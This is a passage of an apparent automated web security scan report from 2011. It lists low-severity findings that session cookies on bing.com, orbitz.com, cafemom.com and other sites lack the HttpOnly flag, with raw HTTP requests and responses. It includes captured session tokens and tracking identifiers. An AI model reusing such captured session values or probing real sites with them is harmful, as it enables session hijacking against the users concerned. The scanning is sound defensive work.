User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 01 Feb 2011 14:30:23 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
X-Pingback: http://benjaminsterling.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=cf9969fe4a0abd1e67fcd6bbd18f7f6a; path=/
Last-Modified: Tue, 01 Feb 2011 14:30:24 GMT
Location: http://benjaminsterling.com/experiments/jqShuffle/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

12.145. http://www.bing.com/travel/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=F9A5BDF8554B5A521E4ADD0F53F06045; Domain=.bing.com; Path=/travel
ETID=BCID-kn9rba4tmh4byz7aru4ncjhjrr6_VID-z1ardgqj2preelyz6fq87n8dokpko_UID-; Domain=.bing.com; Expires=Fri, 01-Feb-2013 15:43:37 GMT; Path=/travel
_SS=SID=914A77BB8D3B44F08D853573E93F3935; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:37 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cce78c16cfad246628701c059bb2c872b; expires=Fri, 01-Feb-2013 15:43:37 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:37 GMT; domain=.bing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.146. http://www.bing.com/travel/content/search previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/content/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=DB382E42EC1C6F1A2AEB3183FD02334F; Path=/travel
_SS=SID=B9FD2F05CE624E8D8225D133EB9C4444; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:38 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c2b76bfd18f8b4505beb02a52509d49a9; expires=Fri, 01-Feb-2013 15:43:38 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:38 GMT; domain=.bing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.147. http://www.bing.com/travel/deals/airline-ticket-deals.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/deals/airline-ticket-deals.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=939166F93ADAFBDCA0C706CED4E4498E; Domain=.bing.com; Path=/travel
ETID=BCID-z6veri81lohd4eyz731qogjsh6trg_VID-5hgouum15ig37yz5flek5lnv1ko4_UID-; Domain=.bing.com; Expires=Fri, 01-Feb-2013 15:43:42 GMT; Path=/travel
_SS=SID=F623F5DE46884100AAF307099DE30493; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:42 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c9c879636e910490c875b1aa66da44d12; expires=Fri, 01-Feb-2013 15:43:42 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:42 GMT; domain=.bing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.148. http://www.cafemom.com/group/416 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafemom.com
Path:	/group/416

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=kaal1k0po2hun5f30108dr9mr2; path=/; domain=.cafemom.com
PHPSESSID=m2opnk57fo2c72ffiiqtijl195; path=/; domain=.cafemom.com
cafemomis=m2opnk57fo2c72ffiiqtijl195; expires=Sun, 31-Jan-2021 04:07:11 GMT; path=/; domain=.cafemom.com
fp=%2Fgroup%2F416; expires=Sat, 05-Mar-2011 04:07:11 GMT; path=/; domain=.cafemom.com

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /group/416 HTTP/1.1
Host: www.cafemom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.149. http://www.cafemom.com/group/46574 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafemom.com
Path:	/group/46574

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=43jec9pqr9f52f3a8egcl5ds32; path=/; domain=.cafemom.com
PHPSESSID=tfb5j3dg583h0nb9s3uo6m6j85; path=/; domain=.cafemom.com
cafemomis=tfb5j3dg583h0nb9s3uo6m6j85; expires=Sun, 31-Jan-2021 04:07:11 GMT; path=/; domain=.cafemom.com
fp=%2Fgroup%2F46574; expires=Sat, 05-Mar-2011 04:07:11 GMT; path=/; domain=.cafemom.com

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /group/46574 HTTP/1.1
Host: www.cafemom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.150. http://www.directstartv.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.directstartv.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=974g2e82tiitvpprcuqksnv1h6; path=/; domain=.directstartv.com
Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1462b; path=/; domain=.directstartv.com
Keyword=deleted; expires=Tue, 02-Feb-2010 15:45:15 GMT; path=/; domain=.directstartv.com
EngineID=deleted; expires=Tue, 02-Feb-2010 15:45:15 GMT; path=/; domain=.directstartv.com
VisitorID=149810701; expires=Thu, 02-Feb-2012 15:45:16 GMT; path=/; domain=.directstartv.com
VisitID=162148332; expires=Thu, 02-Feb-2012 15:45:16 GMT; path=/; domain=.directstartv.com
lpd=default; expires=Sun, 03-Apr-2011 15:45:16 GMT; path=/; domain=.directstartv.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.151. http://www.ebookers.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.ebookers.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=A08EB2ED4D2B89B08BBE7C04829B3488; Path=/
AustinLocale=en_GB; Expires=Mon, 20-Feb-2079 18:58:49 GMT; Path=/
BetaGroup="02/02/2011 09:44:42|A|A|A|C|A|H|B|P|A"; Version=1; Max-Age=1209600; Expires=Wed, 16-Feb-2011 15:44:42 GMT; Path=/
myTests=UBP323_SinglePage%3A%7C%3A%7CUBP300_Insurance%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; Expires=Tue, 28-Jan-2031 15:44:42 GMT; Path=/
anon=1611554171001296661482471; Expires=Tue, 28-Jan-2031 15:44:42 GMT; Path=/
NSC_JO5cdgp0cbghebddh2tpgfcuzvroweu=ffffffff09e3558c45525d5f4f58455e445a4a4217b9;path=/
NSC_xxx.fcpplfst.dpn.80_gxe=ffffffff09e308f645525d5f4f58455e445a4a423660;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.ebookers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A08EB2ED4D2B89B08BBE7C04829B3488; Path=/
Set-Cookie: AustinLocale=en_GB; Expires=Mon, 20-Feb-2079 18:58:49 GMT; Path=/
Set-Cookie: BetaGroup="02/02/2011 09:44:42|A|A|A|C|A|H|B|P|A"; Version=1; Max-Age=1209600; Expires=Wed, 16-Feb-2011 15:44:42 GMT; Path=/
Set-Cookie: myTests=UBP323_SinglePage%3A%7C%3A%7CUBP300_Insurance%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; Expires=Tue, 28-Jan-2031 15:44:42 GMT; Path=/
Set-Cookie: anon=1611554171001296661482471; Expires=Tue, 28-Jan-2031 15:44:42 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 15:44:42 GMT
Set-Cookie: NSC_JO5cdgp0cbghebddh2tpgfcuzvroweu=ffffffff09e3558c45525d5f4f58455e445a4a4217b9;path=/
Set-Cookie: NSC_xxx.fcpplfst.dpn.80_gxe=ffffffff09e308f645525d5f4f58455e445a4a423660;path=/
Content-Length: 106455

...[SNIP]...

12.152. http://www.faneuilhallmarketplace.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.faneuilhallmarketplace.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESS822634fc18c5655cb7b0ed0444b1667e=settnkvgpsrtn2un8knl5ldnl4; expires=Fri, 25-Feb-2011 19:19:40 GMT; path=/; domain=.faneuilhallmarketplace.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.faneuilhallmarketplace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.153. http://www.gorp.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.gorp.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSION_OO=D58D44404F14F4E6478556F96ECBD302; Path=/
NSC_xxx.bxbz.dpn.80_dt_efgbvmu=ffffffff09e32e8545525d5f4f58455e445a4a423660;path=/
NSC_xxx.bxbz.dpn.80_gxe=ffffffff09e3882b45525d5f4f58455e445a4a423660;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.gorp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.154. http://www.hotelclub.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.hotelclub.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDACTBCTST=JDLDPPJDKIGOMNJCOGBEAPHD; path=/
HTC=AppVer=1%2E0; path=/
ltvisit=%7B668F2047%2D797A%2D453F%2DAADB%2D68FEEAF42C18%7D; expires=Sun, 31-Dec-2034 13:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.hotelclub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Cteonnt-Length: 228103
Content-Type: text/html; Charset=windows-1252
Expires: Tue, 01 Feb 2011 15:57:52 GMT
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Date: Wed, 02 Feb 2011 15:57:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: HTC=AppVer=1%2E0; path=/
Set-Cookie: ltvisit=%7B668F2047%2D797A%2D453F%2DAADB%2D68FEEAF42C18%7D; expires=Sun, 31-Dec-2034 13:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACTBCTST=JDLDPPJDKIGOMNJCOGBEAPHD; path=/
Set-Cookie: NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273a45525d5f4f58455e445a4a422974;path=/;httponly
Content-Length: 228103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

12.155. http://www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.hotels.com
Path:	/ho113791/millennium-bostonian-hotel-boston-boston-united-states/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SESSID=BFCC292E8C0621AA80BCE939DC8ED021.hm04tc03; Domain=.hotels.com; Path=/
guid=2ee125b2-c3d7-49a1-b623-8a4cdfa3d152; Domain=.hotels.com; Expires=Thu, 02-Feb-2012 15:57:56 GMT; Path=/
jsEnabled=false; Domain=.hotels.com; Expires=Thu, 03-Feb-2011 15:57:56 GMT; Path=/
user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Thu, 02-Feb-2012 15:57:56 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.156. http://www.kampyle.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.kampyle.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=9d48a3e208103729dc32d5cdd8363eef; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.kampyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.157. http://www.ligattsecurity.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.ligattsecurity.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; path=/
Apache=173.193.214.243.1296574377227827; path=/; expires=Tue, 08-Mar-11 15:32:57 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.ligattsecurity.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=LIGATT+Security+International
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:32:57 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: Apache=173.193.214.243.1296574377227827; path=/; expires=Tue, 08-Mar-11 15:32:57 GMT
Set-Cookie: PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.ligattsecurity.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<tit
...[SNIP]...

12.158. http://www.livestrong.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.livestrong.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=7110efa8adba60163d4df13d64f63be7; expires=Thu, 03 Feb 2011 15:58:01 GMT; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.livestrong.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.159. http://www.milleniumdental.net/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.milleniumdental.net
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=6s4sdr3asl7l8jjkbs45cohrb7; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.milleniumdental.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.160. http://www.mywot.com/en/scorecard/2mdn.net previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mywot.com
Path:	/en/scorecard/2mdn.net

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSf6ce7e3db235723091e59a653e7d96f2=rns4pide46ij4qaq1o3bcot9k0; path=/; domain=.mywot.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/scorecard/2mdn.net HTTP/1.1
Host: www.mywot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.161. http://www.opensource.org/licenses/gpl-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/gpl-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=bq5tf9g3uvqm673m03ri4i84t1; expires=Thu, 24-Feb-2011 18:03:51 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.162. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=lh5k6rqi5q4rg55ah9ia2nnpp2; expires=Thu, 24-Feb-2011 18:03:49 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.163. http://www.opinionlab.com/ozone/24-7.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opinionlab.com
Path:	/ozone/24-7.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQQDDQTCB=EACPFNEADPECIPAGAJNPILOE; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ozone/24-7.asp?referer= HTTP/1.1
Host: www.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 347
Content-Type: text/html
ETag: ""
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQQDDQTCB=EACPFNEADPECIPAGAJNPILOE; path=/
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 16:04:21 GMT
Connection: close

<script>
var _sW=screen.width;
var _sH=screen.height;
window.open('https://pageviewer.opinionlab.com/pv_controlboard.html?url=','PageViewer','height=529,width=705,screenX='+((_sW-705)/2)+',screenY='+(
...[SNIP]...

12.164. http://www.orbitz.com/flight-info/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/flight-info/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=8258E6F4780E0F69A1F8741028922A4C; Path=/
AustinLocale=en_US; Expires=Tue, 21-Feb-2079 10:01:00 GMT; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /flight-info/ HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8258E6F4780E0F69A1F8741028922A4C; Path=/
Set-Cookie: AustinLocale=en_US; Expires=Tue, 21-Feb-2079 10:01:00 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Location: http://www.orbitz.com/App/PrepareFlightsTab
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 34
Date: Thu, 03 Feb 2011 06:46:52 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660;path=/

<html>
</html>

12.165. http://www.orbitz.com/hotels/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/hotels/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; Expires=Mon, 27-Jan-2031 15:23:12 GMT; Path=/
NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.166. http://www.orbitz.com/hotels/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/hotels/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=B2008471E286BF0352AC254A6CAAB529; Path=/
AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:02 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotels/?z=2eb8&r=b HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

12.167. http://www.orbitz.com/hotels/Canada--ON/Toronto/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/hotels/Canada--ON/Toronto/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=28434626E0D56CD35CBF1103FC110834; Path=/
AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:27:25 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

